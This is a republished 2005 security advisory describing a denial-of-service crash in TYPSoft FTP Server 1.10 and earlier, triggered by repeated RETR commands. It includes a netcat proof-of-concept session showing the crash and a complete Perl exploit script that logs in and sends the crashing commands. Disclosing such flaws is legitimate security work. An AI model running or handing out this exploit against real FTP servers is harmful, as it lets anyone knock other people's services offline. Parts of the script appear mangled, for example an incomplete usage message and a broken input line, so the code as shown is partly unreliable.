Ads TYPSoft FTP Server RETR DoS Tuesday, 18 October 2005 Summary "TYPSoft FTP Server is a fast and easy FTP server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things." By crafting special request for TYPSoft FTP Server, it is possible to crash the server creating a DoS attack. Credit: The information has been provided by Morning Wood. The original article can be found at: http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt Details Vulnerable Systems: * TYPSoft FTP Server version 1.10 and prior By sending RETR command to Typsoft FTP server, attackers can cause the server to crash making a DoS attack. Proof of Concept: nc -v 192.168.0.2 21 ftpserv [192.168.0.2] 21 (ftp) open 220 TYPSoft FTP Server 1.11 ready... USER ok 331 Password required for ok. PASS ok 230 User ok logged in. RETR 0 150 Opening data connection for 0. RETR 0 150 Opening data connection for 0. [ crash here ] Exception ESocketException in module ftpserv.exe at 000862A6 "no port specified" Exploit: #!/usr/bin/perl use IO::Socket; use Socket; print " -= TYPSoft FTP Server <= v1.11 DOS =- "; print "-= wood (at) Exploitlabs.com =- "; if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl [port] " }; if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" }; $adr = $ARGV[0]; $usr = $ARGV[1]; $pas = $ARGV[2]; $err1 = "RETR 0"; $err2 = "RETR 1"; $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt "; $remote->autoflush(1); print $remote "USER $usr " and print "1. Sending : USER $usr... " or die "Error: cant send user "; print $remote "PASS $pas " and print "2. Sending : PASS $pas... " or die "Error: cant send pass "; print $remote "$err1/ " and print "3. Sending : ErrorCode 1... "; print $remote "$err2/ " and print "4. Sending : ErrorCode 2... "or die "Error: cant send error code "; print "Attack done. press any key to exit "; $bla= ; close $remote; #EoF   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.